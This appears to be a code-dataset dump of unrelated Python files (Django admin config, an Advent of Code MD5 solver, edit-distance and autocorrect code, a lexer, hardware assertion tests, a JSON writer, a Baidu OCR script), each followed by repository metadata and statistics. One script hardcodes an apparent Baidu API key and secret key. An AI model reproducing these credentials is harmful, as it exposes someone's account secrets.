'id', 'last_name', 'first_name', 'school', 'grade_level', 'shs_track', 'projected_course', 'email',
'date_of_birth', 'mobile',
'gender', 'date_registered', 'registered_event')
actions = ['export_as_csv']
list_filter = ('registered_event', 'school',)
change_list_template = 'change_list.html'
search_fields = ('first_name', 'last_name', 'email')
@admin.register(Event)
class EventAdmin(admin.ModelAdmin):
list_display = ('name', 'start_date', 'end_date')
fieldsets = (
(None, {
'fields': ('name', 'logo', 'event_registration_url')
}),
('Event Date', {
'fields': ('start_date', 'end_date')
}),
)
readonly_fields = ('event_registration_url',)
admin.site.register(SchoolList)
admin.site.register(ShsTrack)
| 30.712121
| 117
| 0.665022
| 222
| 2,027
| 5.837838
| 0.396396
| 0.024691
| 0.033951
| 0.050926
| 0.236111
| 0.188272
| 0.188272
| 0.188272
| 0.188272
| 0.188272
| 0
| 0
| 0.197829
| 2,027
| 65
| 118
| 31.184615
| 0.797048
| 0
| 0
| 0.212766
| 0
| 0
| 0.260483
| 0.021707
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021277
| false
| 0
| 0.085106
| 0
| 0.446809
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c1e8f234365a8d2c0de799db1420fb70afb127b
| 1,251
|
py
|
Python
|
python/src/aoc/year2016/day5.py
|
ocirne/adventofcode
|
ea9b5f1b48a04284521e85c96b420ed54adf55f0
|
[
"Unlicense"
] | 1
|
2021-02-16T21:30:04.000Z
|
2021-02-16T21:30:04.000Z
|
python/src/aoc/year2016/day5.py
|
ocirne/adventofcode
|
ea9b5f1b48a04284521e85c96b420ed54adf55f0
|
[
"Unlicense"
] | null | null | null |
python/src/aoc/year2016/day5.py
|
ocirne/adventofcode
|
ea9b5f1b48a04284521e85c96b420ed54adf55f0
|
[
"Unlicense"
] | null | null | null |
import hashlib
from itertools import islice
from aoc.util import load_input
def search(door_id, is_part1=False, is_part2=False):
i = 0
while True:
md5_hash = hashlib.md5((door_id + str(i)).encode()).hexdigest()
if md5_hash.startswith("00000"):
if is_part1:
yield md5_hash[5]
if is_part2:
pos, char = md5_hash[5:7]
if pos.isnumeric() and 0 <= int(pos) <= 7:
yield int(pos), md5_hash[6]
i += 1
def part1(lines):
"""
>>> part1(['abc'])
'18f47a30'
"""
door_id = lines[0].strip()
return "".join(islice(search(door_id, is_part1=True), 8))
def part2(lines, be_extra_proud=True):
"""
>>> part2(['abc'], False)
'05ace8e3'
"""
result = 8 * [" "]
count = 0
for position, character in search(lines[0].strip(), is_part2=True):
if result[position] == " ":
result[position] = character
count += 1
if count == 8:
return "".join(result)
if be_extra_proud:
print("".join(result))
if __name__ == "__main__":
data = load_input(__file__, 2016, "5")
print(part1(data))
print(part2(data))
| 24.529412
| 71
| 0.529976
| 156
| 1,251
| 4.038462
| 0.397436
| 0.055556
| 0.038095
| 0.044444
| 0.060317
| 0
| 0
| 0
| 0
| 0
| 0
| 0.062574
| 0.322942
| 1,251
| 50
| 72
| 25.02
| 0.681228
| 0.052758
| 0
| 0
| 0
| 0
| 0.013962
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.090909
| 0
| 0.242424
| 0.090909
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c1ff1fa706a7ee54f33c5565b4c5b7b1c4bf065
| 7,700
|
py
|
Python
|
src/1-3_autocorrect.py
|
BernhardSchiffer/1-dynamic-programming
|
81d89e6d579a329058a40b0e6c85b45c97db083a
|
[
"MIT"
] | null | null | null |
src/1-3_autocorrect.py
|
BernhardSchiffer/1-dynamic-programming
|
81d89e6d579a329058a40b0e6c85b45c97db083a
|
[
"MIT"
] | null | null | null |
src/1-3_autocorrect.py
|
BernhardSchiffer/1-dynamic-programming
|
81d89e6d579a329058a40b0e6c85b45c97db083a
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# %%
# Assignment Pt. 1: Edit Distances
import numpy as np
from bs4 import BeautifulSoup
import math
vocabulary_file = open('../res/count_1w.txt', 'r')
lines = vocabulary_file.readlines()
vocabulary = dict()
word_count = 0
# Strips the newline character
for line in lines:
line = line.strip()
w = line.split('\t')
word = {'word': w[0], 'count': w[1]}
word_count = word_count + int(w[1])
vocabulary[word['word']] = word
print(len(vocabulary))
print(list(vocabulary.values())[0:5])
gem_doppel = [
("GCGTATGAGGCTAACGC", "GCTATGCGGCTATACGC"),
("kรผhler schrank", "schรผler krank"),
("the longest", "longest day"),
("nicht ausgeloggt", "licht ausgenockt"),
("gurken schaben", "schurkengaben")
]
# %%
def hamming(s1: str, s2: str) -> int:
distance = 0
# pad strings to equal length
if(len(s2) > len(s1)):
s1 = s1.ljust(len(s2), ' ')
else:
s2 = s2.ljust(len(s1), ' ')
# calculate differences in characters
for c1, c2 in zip(s1,s2):
if(c1 != c2):
distance = distance + 1
return distance
assert hamming('GCGTATGAGGCTAACGC', 'GCTATGCGGCTATACGC') == 10
assert hamming('kรผhler schrank', 'schรผler krank') == 13
assert hamming('the longest', 'longest day') == 11
assert hamming('nicht ausgeloggt', 'licht ausgenockt') == 4
assert hamming('gurken schaben', 'schurkengaben') == 14
# %%
def levenshtein(s1: str, s2: str) -> (int, str):
get_values = lambda v: [vv[0] for vv in v]
operations = list()
distances = np.zeros((len(s1)+1, len(s2)+1))
distances[0,:] = [*range(0,len(s2)+1)]
distances[:,0] = [*range(0,len(s1)+1)]
operations.append(['i'*int(i) for i in distances[0,:]])
for row in distances[1:,:]:
operations.append(['d'*int(i) for i in row])
for cidx in range(1,np.shape(distances)[0]):
for ridx in range(1,np.shape(distances)[1]):
c1 = s1[cidx-1]
c2 = s2[ridx-1]
deletion = (distances[cidx-1,ridx] + 1, operations[cidx-1][ridx] + 'd')
insertion = (distances[cidx,ridx-1] + 1, operations[cidx][ridx-1] + 'i')
if(c1 != c2):
substitution = (distances[cidx-1,ridx-1] + 1, operations[cidx-1][ridx-1] + 's')
else:
substitution = (distances[cidx-1,ridx-1] + 0, operations[cidx-1][ridx-1] + 'm')
x = [deletion, insertion, substitution]
minimum = min(get_values(x))
minidx = get_values(x).index(minimum)
distances[cidx,ridx] = minimum
operations[cidx][ridx] = x[minidx][1]
distance = int(distances[-1,-1])
operations = operations[-1][-1]
return (distance, operations)
assert levenshtein('GCGTATGAGGCTAACGC', 'GCTATGCGGCTATACGC') == (3, 'mmdmmmmsmmmmmimmmm')
assert levenshtein('kรผhler schrank', 'schรผler krank') == (6, 'ssmimmmmsddmmmm')
assert levenshtein('the longest', 'longest day') == (8, 'ddddmmmmmmmiiii')
assert levenshtein('nicht ausgeloggt', 'licht ausgenockt') == (4, 'smmmmmmmmmmsmssm')
assert levenshtein('gurken schaben', 'schurkengaben') == (7, 'siimmmmmsdddmmmm')
# %%
# Assignment Pt. 2: Auto-Correct
def suggest(w: str, dist, max_cand=5) -> list:
"""
w: word in question
dist: edit distance to use
max_cand: maximum of number of suggestions
returns a list of tuples (word, dist, score) sorted by score and distance"""
if w in vocabulary:
Pw = math.log(int(vocabulary[w]['count'])/word_count)
return [(w, 0, Pw)]
suggestions = list()
for word in list(vocabulary.values())[:]:
distance, _ = dist(w, word['word'])
Pw = math.log(int(word['count'])/word_count)
suggestions.append((word['word'], distance, 0.5* math.log(1/distance) + Pw))
suggestions.sort(key=lambda s: s[1])
return suggestions[:max_cand]
examples = [
"pirates", # in-voc
"pirutes", # pirates?
"continoisly", # continuosly?
]
for w in examples[:]:
print(w, suggest(w, levenshtein, max_cand=3))
# sample result; your scores may vary!
# pirates [('pirates', 0, -11.408058827802126)]
# pirutes [('pirates', 1, -11.408058827802126), ('minutes', 2, -8.717825438953103), ('viruses', 2, -11.111468702571859)]
# continoisly [('continously', 1, -15.735337826575178), ('continuously', 2, -11.560071979871001), ('continuosly', 2, -17.009283000138204)]
# %%
# Assignment Pt. 3: Needleman-Wunsch
# reading content
file = open("../res/de.xml", "r")
contents = file.read()
# parsing
soup = BeautifulSoup(contents, 'xml')
# get characters
keys = soup.find_all('char')
keyboard = {}
# display content
for key in keys:
k = {'value': key.string}
# get key of character
parent = key.parent
k['left'] = parent['left']
k['top'] = parent['top']
k['width'] = parent['width']
k['height'] = parent['height']
k['fingerIndex'] = parent['fingerIndex']
keyboard[k['value']] = k
# get special keys
specialKeys = soup.find_all('specialKey')
for key in specialKeys:
if key['type'] == 'space':
keyboard[' '] = {
'value': ' ',
'left': key['left'],
'top': key['top'],
'width': key['width'],
'height': key['height']
}
def keyboardsim(s1: str, s2: str) -> float:
key1 = keyboard[s1]
key2 = keyboard[s2]
key1_pos = (int(key1['left']), int(key1['top']))
key2_pos = (int(key2['left']), int(key2['top']))
return math.dist(key1_pos, key2_pos)
def nw(s1: str, s2: str, d: float = 0, sim = keyboardsim) -> float:
get_values = lambda v: [vv[0] for vv in v]
operations = list()
scores = np.zeros((len(s1)+1, len(s2)+1))
scores[0,:] = [i*-1 for i in [*range(0,len(s2)+1)]]
scores[:,0] = [i*-1 for i in [*range(0,len(s1)+1)]]
operations.append(['-'*int(-i) for i in scores[0,:]])
for row in scores[1:,:]:
operations.append(['-'*int(-i) for i in row])
for cidx in range(1,np.shape(scores)[0]):
for ridx in range(1,np.shape(scores)[1]):
c1 = s1[cidx-1]
c2 = s2[ridx-1]
deletion = (scores[cidx-1,ridx] - 1, operations[cidx-1][ridx] + '-')
insertion = (scores[cidx,ridx-1] - 1, operations[cidx][ridx-1] + '-')
if(c1 != c2):
cost = sim(c1, c2)
substitution = (scores[cidx-1,ridx-1] - cost, operations[cidx-1][ridx-1] + '-')
else:
substitution = (scores[cidx-1,ridx-1] + 1, operations[cidx-1][ridx-1] + '+')
x = [deletion, insertion, substitution]
maximum = max(get_values(x))
minidx = get_values(x).index(maximum)
scores[cidx,ridx] = maximum
operations[cidx][ridx] = x[minidx][1]
score = int(scores[-1,-1])
operations = operations[-1][-1]
return (score, operations)
#return score
assert nw('GCGTATGAGGCTAACGC', 'GCTATGCGGCTATACGC', sim=lambda x,y: 1) == (12, '++-++++-+++++-++++')
assert nw('kรผhler schrank', 'schรผler krank', sim=lambda x,y: 1) == (3, '--+-++++---++++')
assert nw('the longest', 'longest day', sim=lambda x,y: 1) == (-1, '----+++++++----')
assert nw('nicht ausgeloggt', 'licht ausgenockt', sim=lambda x,y: 1) == (8, '-++++++++++-+--+')
assert nw('gurken schaben', 'schurkengaben', sim=lambda x,y: 1) == (2, '---+++++----++++')
# How does your suggest function behave with nw and a keyboard-aware similarity?
print(nw('GCGTATGAGGCTAACGC', 'GCTATGCGGCTATACGC'))
print(nw('kรผhler schrank', 'schรผler krank'))
print(nw('the longest', 'longest day'))
print(nw('nicht ausgeloggt', 'licht ausgenockt'))
print(nw('gurken schaben', 'schurkengaben'))
# %%
| 32.352941
| 138
| 0.587662
| 987
| 7,700
| 4.558257
| 0.222898
| 0.017782
| 0.024005
| 0.022227
| 0.289398
| 0.206046
| 0.166037
| 0.148033
| 0.072238
| 0.072238
| 0
| 0.050995
| 0.223247
| 7,700
| 237
| 139
| 32.489451
| 0.701221
| 0.123117
| 0
| 0.129032
| 0
| 0
| 0.168159
| 0
| 0
| 0
| 0
| 0
| 0.096774
| 1
| 0.032258
| false
| 0
| 0.019355
| 0
| 0.090323
| 0.051613
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c2312e967df908333d00837244d79e34fe4f564
| 2,845
|
py
|
Python
|
scripts/code_standards/code_standards.py
|
dolphingarlic/sketch-frontend
|
e646b7d51405e8a693f45472aa3cc6991a6f38af
|
[
"X11"
] | 1
|
2020-12-06T03:40:53.000Z
|
2020-12-06T03:40:53.000Z
|
scripts/code_standards/code_standards.py
|
dolphingarlic/sketch-frontend
|
e646b7d51405e8a693f45472aa3cc6991a6f38af
|
[
"X11"
] | null | null | null |
scripts/code_standards/code_standards.py
|
dolphingarlic/sketch-frontend
|
e646b7d51405e8a693f45472aa3cc6991a6f38af
|
[
"X11"
] | null | null | null |
#!/usr/bin/env python2.6
# -*- coding: utf-8 -*-
from __future__ import print_function
import optparse
import path_resolv
from path_resolv import Path
def check_file(f, show_info, override_ignores):
text = f.read()
if ("@code standards ignore file" in text) and (not override_ignores):
return
if "\r" in text:
raise Exception("FATAL - dos endlines in %s" %(f))
for i, line in enumerate(text.split("\n")):
def warn(text):
print("%30s %30s :%03d" %("WARNING - " + text, f, i))
def info(text):
if show_info:
print("%30s %30s :%03d" %("INFO - " + text, f, i))
if "\t" in line:
warn("tabs present")
# for now, ignore Eclipse blank comment lines
if line.endswith(" ") and line.strip() != "*":
warn("trailing whitespace")
# the following can be ignored
if "@code standards ignore" in line and not override_ignores:
continue
# spaces don't show up as much for variable indent
relevant_line = line.lstrip('/').strip()
if float(len(line)) * 0.7 + float(len(relevant_line)) * 0.3 > 90:
warn("long line")
# the following only apply to uncommented code
if line.lstrip().startswith("//"):
continue
# the following do not apply to this file
if f.endswith("build_util/code_standards.py"):
continue
if "System.exit" in line:
warn("raw system exit")
if "DebugOut.assertSlow" in line:
info("debug assert slow call")
def warn(text):
print("%30s %30s" %("WARNING - " + text, f))
if f.endswith(".java") and not "http://creativecommons.org/licenses/BSD/" in text:
warn("no license")
def main(srcdir, file_extensions, **kwargs):
assert type(file_extensions) == list
for root, dirs, files in Path(srcdir).walk():
for f in files:
f = Path(root, f)
if f.splitext()[-1][1:] in file_extensions:
check_file(f, **kwargs)
if __name__ == "__main__":
cmdopts = optparse.OptionParser(usage="%prog [options]")
cmdopts.add_option("--srcdir", default=Path("."),
help="source directory to look through")
cmdopts.add_option("--file_extensions", default="java,scala,py,sh",
help="comma-sepated list of file extensions")
cmdopts.add_option("--show_info", action="store_true",
help="show info for command")
cmdopts.add_option("--override_ignores", action="store_true",
help="ignore \"@code standards ignore [file]\"")
options, args = cmdopts.parse_args()
options.file_extensions = options.file_extensions.split(",")
if not options.show_info:
print("use --show_info to show more notices")
main(**options.__dict__)
| 34.695122
| 86
| 0.59754
| 366
| 2,845
| 4.516393
| 0.418033
| 0.059286
| 0.038717
| 0.025408
| 0.026618
| 0.026618
| 0
| 0
| 0
| 0
| 0
| 0.012925
| 0.265729
| 2,845
| 81
| 87
| 35.123457
| 0.778363
| 0.088576
| 0
| 0.084746
| 0
| 0
| 0.228538
| 0.010828
| 0
| 0
| 0
| 0
| 0.050847
| 1
| 0.084746
| false
| 0
| 0.067797
| 0
| 0.169492
| 0.084746
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c25269f1d545577e247a812c7d95d25ce72bbfe
| 2,368
|
py
|
Python
|
grease/scanner.py
|
JorgeRubio96/grease-lang
|
94a7cf9f01339ae2aac2c1fa1fefb623c32fffc9
|
[
"MIT"
] | null | null | null |
grease/scanner.py
|
JorgeRubio96/grease-lang
|
94a7cf9f01339ae2aac2c1fa1fefb623c32fffc9
|
[
"MIT"
] | null | null | null |
grease/scanner.py
|
JorgeRubio96/grease-lang
|
94a7cf9f01339ae2aac2c1fa1fefb623c32fffc9
|
[
"MIT"
] | 1
|
2018-10-09T22:57:34.000Z
|
2018-10-09T22:57:34.000Z
|
import ply.lex as lex
from grease.core.indents import Indents
reserved = {
'var': 'VAR',
'if': 'IF',
'else': 'ELSE',
'scan': 'SCAN',
'print': 'PRINT',
'and': 'AND',
'or': 'OR',
'Bool': 'BOOL',
'Int': 'INT',
'Float': 'FLOAT',
'Char': 'CHAR',
'fn': 'FN',
'interface': 'INTERFACE',
'import': 'IMPORT',
'struct':'STRUCT',
'while':'WHILE',
'alias':'ALIAS',
'as':'AS',
'gt': 'GT',
'ge': 'GE',
'lt': 'LT',
'le': 'LE',
'eq': 'EQ',
'not':'NOT',
'from': 'FROM',
'return': 'RETURN',
'true': 'TRUE',
'false': 'FALSE'
}
tokens = [
'ID', 'CONST_INT', 'CONST_REAL', 'CONST_STR', 'CONST_CHAR',
'ARROW', 'SEMICOLON', 'COLON', 'COMMA', 'DOT', 'EQUALS', 'NEW_LINE',
'OPEN_BRACK','CLOSE_BRACK', 'OPEN_PAREN', 'CLOSE_PAREN', 'PLUS', 'MINUS',
'TIMES', 'DIVIDE', 'AMP', 'INDENT', 'DEDENT'
] + list(reserved.values())
t_DOT = r'\.'
t_SEMICOLON = r'\;'
t_COLON = r'\:'
t_COMMA = r'\,'
t_OPEN_BRACK = r'\['
t_CLOSE_BRACK = r'\]'
t_EQUALS = r'\='
t_OPEN_PAREN = r'\('
t_CLOSE_PAREN = r'\)'
t_PLUS = r'\+'
t_MINUS = r'\-'
t_TIMES = r'\*'
t_DIVIDE = r'\/'
t_AMP = r'\&'
t_ARROW = r'\-\>'
t_ignore = ' '
def t_ignore_SINGLE_COMMENT(t):
r'\#.*\n'
t.lexer.lineno += 1
def t_ignore_MULTI_COMMENT(t):
r'\/\*[\s\S]*\*\/\s*'
t.lexer.lineno += t.value.count('\n')
def t_ID(t):
r'[a-zA-Z_][a-zA-Z0-9_]*'
t.type = reserved.get(t.value, 'ID')
if t.type == 'CONST_BOOL':
if t.value == 'true':
t.value = True
else:
t.value = False
return t
def t_CONST_REAL(t):
r'[0-9]+\.[0-9]+'
t.value = float(t.value)
return t
def t_CONST_INT(t):
r'[0-9]+'
t.value = int(t.value)
return t
def t_CONST_STR(t):
r'\".+\"'
t.value = t.value[1:-1]
return t
def t_CONST_CHAR(t):
r'\'.+\''
t.value = t.value[1:-1]
return t
def t_NEW_LINE(t):
r'\n\s*[\t ]*'
t.lexer.lineno += t.value.count('\n')
t.value = len(t.value) - 1 - t.value.rfind('\n')
return t
def first_word(s):
whites = [' ', '\t', '\n']
low = 0
for l in s:
if l in whites:
break
low += 1
return s[0:low]
def t_error(t):
print("Unexpected \"{}\" at line {}".format(first_word(t.value), t.lexer.lineno))
grease_lexer = Indents(lex.lex())
| 19.89916
| 85
| 0.505912
| 354
| 2,368
| 3.234463
| 0.271186
| 0.094323
| 0.052402
| 0.048035
| 0.145852
| 0.127511
| 0.127511
| 0.047162
| 0.047162
| 0.047162
| 0
| 0.009577
| 0.250422
| 2,368
| 118
| 86
| 20.067797
| 0.635493
| 0.040541
| 0
| 0.09901
| 0
| 0
| 0.226774
| 0.009291
| 0
| 0
| 0
| 0
| 0
| 1
| 0.09901
| false
| 0
| 0.029703
| 0
| 0.19802
| 0.019802
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c2968143388eec54e35192431494447d2c82d24
| 3,673
|
py
|
Python
|
tests/test_assert_immediate.py
|
makaimann/fault
|
8c805415f398e64971d18fbd3014bc0b59fb38b8
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_assert_immediate.py
|
makaimann/fault
|
8c805415f398e64971d18fbd3014bc0b59fb38b8
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_assert_immediate.py
|
makaimann/fault
|
8c805415f398e64971d18fbd3014bc0b59fb38b8
|
[
"BSD-3-Clause"
] | null | null | null |
import tempfile
import pytest
import fault as f
import magma as m
from fault.verilator_utils import verilator_version
@pytest.mark.parametrize('success_msg', [None, "OK"])
@pytest.mark.parametrize('failure_msg', [None, "FAILED"])
@pytest.mark.parametrize('severity', ["error", "fatal", "warning"])
@pytest.mark.parametrize('on', [None, f.posedge])
@pytest.mark.parametrize('name', [None, "my_assert"])
def test_immediate_assert(capsys, failure_msg, success_msg, severity, on,
name):
if verilator_version() < 4.0:
pytest.skip("Untested with earlier verilator versions")
if failure_msg is not None and severity == "fatal":
# Use integer exit code
failure_msg = 1
class Foo(m.Circuit):
io = m.IO(
I0=m.In(m.Bit),
I1=m.In(m.Bit)
) + m.ClockIO()
io.CLK.unused()
f.assert_immediate(~(io.I0 & io.I1),
success_msg=success_msg,
failure_msg=failure_msg,
severity=severity,
on=on if on is None else on(io.CLK),
name=name)
tester = f.Tester(Foo, Foo.CLK)
tester.circuit.I0 = 1
tester.circuit.I1 = 1
tester.step(2)
try:
with tempfile.TemporaryDirectory() as dir_:
tester.compile_and_run("verilator", magma_opts={"inline": True},
flags=['--assert'], directory=dir_,
disp_type="realtime")
except AssertionError:
assert failure_msg is None or severity in ["error", "fatal"]
else:
# warning doesn't trigger exit code/failure (but only if there's a
# failure_msg, otherwise severity is ignored)
assert severity == "warning"
out, _ = capsys.readouterr()
if failure_msg is not None:
if severity == "warning":
msg = "%Warning:"
else:
msg = "%Error:"
msg += " Foo.v:29: Assertion failed in TOP.Foo"
if name is not None:
msg += f".{name}"
if severity == "error":
msg += f": {failure_msg}"
assert msg in out
tester.clear()
tester.circuit.I0 = 0
tester.circuit.I1 = 1
tester.step(2)
with tempfile.TemporaryDirectory() as dir_:
tester.compile_and_run("verilator",
magma_opts={"inline": True,
"verilator_compat": True},
flags=['--assert'], directory=dir_,
disp_type="realtime")
out, _ = capsys.readouterr()
if success_msg is not None:
assert success_msg in out
def test_immediate_assert_tuple_msg(capsys):
if verilator_version() < 4.0:
pytest.skip("Untested with earlier verilator versions")
class Foo(m.Circuit):
io = m.IO(
I0=m.In(m.Bit),
I1=m.In(m.Bit)
)
f.assert_immediate(
io.I0 == io.I1,
failure_msg=("io.I0 -> %x != %x <- io.I1", io.I0, io.I1)
)
tester = f.Tester(Foo)
tester.circuit.I0 = 1
tester.circuit.I1 = 0
tester.eval()
with pytest.raises(AssertionError):
with tempfile.TemporaryDirectory() as dir_:
tester.compile_and_run("verilator", magma_opts={"inline": True},
flags=['--assert'], directory=dir_,
disp_type="realtime")
out, _ = capsys.readouterr()
msg = ("%Error: Foo.v:13: Assertion failed in TOP.Foo: io.I0 -> 1 != 0 <-"
" io.I1")
assert msg in out, out
| 34.980952
| 78
| 0.54288
| 433
| 3,673
| 4.484988
| 0.237875
| 0.056643
| 0.054068
| 0.014418
| 0.438723
| 0.415036
| 0.393409
| 0.316684
| 0.316684
| 0.316684
| 0
| 0.015977
| 0.335421
| 3,673
| 104
| 79
| 35.317308
| 0.779599
| 0.035393
| 0
| 0.373626
| 0
| 0.010989
| 0.131676
| 0
| 0
| 0
| 0
| 0
| 0.186813
| 1
| 0.021978
| false
| 0
| 0.054945
| 0
| 0.120879
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c312cb7c5567e3a8e860f6d1634192c56119a38
| 2,580
|
py
|
Python
|
jaf/main.py
|
milano-slesarik/jaf
|
97c0a579f4ece70dbfb583d72aa35380f7a82f8d
|
[
"MIT"
] | null | null | null |
jaf/main.py
|
milano-slesarik/jaf
|
97c0a579f4ece70dbfb583d72aa35380f7a82f8d
|
[
"MIT"
] | null | null | null |
jaf/main.py
|
milano-slesarik/jaf
|
97c0a579f4ece70dbfb583d72aa35380f7a82f8d
|
[
"MIT"
] | null | null | null |
import json
import os
import typing
from io import IOBase
from jaf.encoders import JAFJSONEncoder
class JsonArrayFileWriterNotOpenError(Exception):
pass
class JsonArrayFileWriter:
MODE__APPEND_OR_CREATE = 'ac'
MODE__REWRITE_OR_CREATE = 'rc'
def __init__(self, filepath: str, mode=MODE__REWRITE_OR_CREATE, indent: typing.Optional[int] = None,
json_encoder=JAFJSONEncoder):
self.filepath: str = filepath
self.mode = mode
self.indent: int = indent
self.lines: int = 0
self.json_encoder = json_encoder
self.file: typing.Optional[IOBase] = None
def __enter__(self) -> 'JsonArrayFileWriter':
self.open()
return self
def __exit__(self, exc_type, exc_val, exc_tb) -> None:
self.close()
def open(self) -> None:
if self.mode == self.MODE__REWRITE_OR_CREATE:
self.file = open(self.filepath, 'w')
self.file.write('[')
elif self.mode == self.MODE__APPEND_OR_CREATE:
if os.path.exists(self.filepath):
with open(self.filepath) as f:
jsn = json.load(f) # loads whole JSON into the memory
os.rename(self.filepath, self.filepath + '.bak')
else:
jsn = []
self.file = open(self.filepath, 'w')
self.file.write('[')
for entry in jsn:
self.write(entry)
elif self.mode == self.MODE__APPEND:
raise NotImplementedError
else:
raise NotImplementedError(f"Unknown write mode \"{self.mode}\"")
def write(self, dct: dict) -> None:
if getattr(self, 'file', None) is None:
raise JsonArrayFileWriterNotOpenError(
"JsonArrayFileWriter needs to be opened by calling `.open()` or used within a context manager `with JsonArrayFileWriter(<FILEPATH>,**kwargs) as writer:`")
jsn = json.dumps(dct, indent=self.indent, cls=self.json_encoder)
if self.lines:
self.file.write(f',')
self.write_newline()
self.file.write(jsn)
self.lines += 1
def write_dict(self, dct: dict) -> None:
self.write(dct)
def write_newline(self):
self.file.write(os.linesep)
def close(self) -> None:
self.file.write('\n')
self.file.write(']')
self.file.close()
with JsonArrayFileWriter('output.json', mode=JsonArrayFileWriter.MODE__APPEND_OR_CREATE, indent=4) as j:
d = {1: 2, 2: 3, 3: 4, 4: 6}
for i in range(1000000):
j.write(d)
| 31.084337
| 170
| 0.601163
| 315
| 2,580
| 4.771429
| 0.32381
| 0.063872
| 0.060546
| 0.035928
| 0.134398
| 0.085163
| 0.050566
| 0.050566
| 0.050566
| 0
| 0
| 0.009772
| 0.286047
| 2,580
| 82
| 171
| 31.463415
| 0.806189
| 0.012403
| 0
| 0.09375
| 0
| 0.015625
| 0.086803
| 0.015711
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0.015625
| 0.078125
| 0
| 0.28125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c3406ddfc224f8162dd8e58c6d1818f19d5fb3c
| 812
|
py
|
Python
|
BluePlug/fork.py
|
liufeng3486/BluePlug
|
c7c5c769ed35c71ebc542d34848d6bf309abd051
|
[
"MIT"
] | 1
|
2019-01-27T04:08:05.000Z
|
2019-01-27T04:08:05.000Z
|
BluePlug/fork.py
|
liufeng3486/BluePlug
|
c7c5c769ed35c71ebc542d34848d6bf309abd051
|
[
"MIT"
] | 5
|
2021-03-18T21:35:20.000Z
|
2022-01-13T00:58:18.000Z
|
BluePlug/fork.py
|
liufeng3486/BluePlug
|
c7c5c769ed35c71ebc542d34848d6bf309abd051
|
[
"MIT"
] | null | null | null |
from aip import AipOcr
BAIDU_APP_ID='14490756'
BAIDU_API_KEY = 'Z7ZhXtleolXMRYYGZ59CGvRl'
BAIDU_SECRET_KEY = 'zbHgDUGmRnBfn6XOBmpS5fnr9yKer8C6'
client= AipOcr(BAIDU_APP_ID, BAIDU_API_KEY, BAIDU_SECRET_KEY)
options = {}
options["recognize_granularity"] = "big"
options["language_type"] = "CHN_ENG"
options["detect_direction"] = "true"
options["detect_language"] = "true"
options["vertexes_location"] = "true"
options["probability"] = "true"
def getimagestream(path):
with open(path, 'rb') as f:
return f.read()
def getcharactor(path):
obj = client.general(getimagestream(path))
if obj.get('error_code'):
return obj
res = []
for r in obj['words_result']:
res.append(r['words'])
return res
if __name__ == '__main__':
r = getcharactor('5.png')
print(r)
| 24.606061
| 62
| 0.69335
| 101
| 812
| 5.29703
| 0.564356
| 0.061682
| 0.052336
| 0.059813
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.025111
| 0.166256
| 812
| 33
| 63
| 24.606061
| 0.76514
| 0
| 0
| 0
| 0
| 0
| 0.276753
| 0.094711
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076923
| false
| 0
| 0.038462
| 0
| 0.230769
| 0.038462
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c36a55c48b2843a0df149d905928f2eb9279e29
| 4,596
|
py
|
Python
|
GuessGame.py
|
VedantKhairnar/Guess-Game
|
a959d03cbfea539a63e451e5c65f7cd9790d1b7f
|
[
"MIT"
] | null | null | null |
GuessGame.py
|
VedantKhairnar/Guess-Game
|
a959d03cbfea539a63e451e5c65f7cd9790d1b7f
|
[
"MIT"
] | null | null | null |
GuessGame.py
|
VedantKhairnar/Guess-Game
|
